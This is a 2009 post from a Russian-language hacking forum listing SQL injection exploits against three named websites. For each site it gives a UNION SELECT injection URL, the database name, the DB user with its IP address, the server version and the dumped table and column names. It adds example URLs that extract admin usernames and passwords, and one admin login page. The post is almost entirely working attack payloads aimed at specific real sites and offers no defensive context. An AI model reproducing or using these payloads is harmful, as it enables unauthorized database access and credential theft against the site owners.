Показать сообщение отдельно

  #2  
Старый 10.12.2009, 17:16
Pr0mo
Новичок
Регистрация: 26.11.2009
Сообщений: 20
С нами: 8662587

Репутация: 60
По умолчанию

-1-
Target : http://www.freestyleagency.eu
Exploit:http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,n ull,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23--
Database : freestyl_freestyle
User : freestyl_agency@localhost
Version : 5.0.85-community-log
Contain :
[0]admin: IdAdmin,UserAdmin,PassAdmin,EmailAdmin,StatusAdmin
[1]models: model_id,first_name,last_name,height,bust_chest,cu p_size,waist,hips,eye_color,hair_colour,hair_lengt h,shoe_size,size,text,card_big,card_s1,card_s2,car d_s3,card_s4,type_id,status,count,date_added,last_ modified
[2]news: news_id,title,content,status,date_added,last_modif ied
[3]type: type_id,type
Example:
http://www.freestyleagency.eu/model-mail.php?type=Video&id=97+AND+1=2+UNION+SELECT+0,c oncat_ws(0x3a,UserAdmin,PassAdmin),2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ad min--

-2-
Target : http://www.web0668.net
Exploit:http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,null,2--
Database : sq_web0668
User : sq_web0668@125.65.112.47
Version : 5.0.45-community-nt-log
Contain :
[0]web_ad: ad_id,ad_size,ad_name,ad_time,ad_url,ad_img
[1]web_admin: admin_id,admin_name,admin_password,admin_type
[2]web_cate: cate_id,cate_name,cate_cate,cate_asc
[3]web_file: file_id,file_about,file_cooperrtion,file_ad
[4]web_hot: hot_id,hot_cate,hot_name,hot_url,hot_img,hot_bz,ho t_views,hot_time
[5]web_links: link_id,link_name,link_color,link_abc,link_url,lin k_img,link_views,link_cate,link_back,link_bz,link_ time,link_type,link_disp
[6]web_mess: ms_id,ms_title,ms_content,ms_user,ms_time,ms_backt ime,ms_views,ms_type,ms_cate
[7]web_ncate: ncate_id,ncate_name,ncate_cate,ncate_asc
[8]web_new: new_id,new_name,new_url,new_views,new_time
[9]web_pl: pl_id,pl_name,pl_content,pl_class,pl_time
[10]web_rank: rank_id,rank_name,rank_url,rank_views,rank_time
[11]web_sys: sys_id,sys_webname,sys_username,sys_tel,sys_fax,sy s_qq,sys_email,sys_address,sys_copyright,sys_websi te,sys_icp
[12]web_txtad: adtxt_id,adtxt_name,adtxt_time,adtxt_url
Example:
http://www.web0668.net/url.php?id=149+AND+1=2+UNION+SELECT+0,concat_ws(0x 3a,admin_name,admin_password),2+from+web_admin--

-3-
Target : http://www.somethingyoushouldread.com
Exploit:http://www.somethingyoushouldread.com/mail/mail.php?id=159+AND+1=2+UNION+SELECT+null,1--
Database : benberkon
User : benberkon@97.74.144.144
Version : 4.1.22-max-log
Contain :
[0]admin: id,name,pass
...
Example:
http://www.somethingyoushouldread.com/mail/mail.php?id=159+and+1=2+union+select+concat_ws(0x3 a,name,pass),1+from+admin--
AdminPanel:
http://somethingyoushouldread.com/upload/login/login.php
 
Ответить с цитированием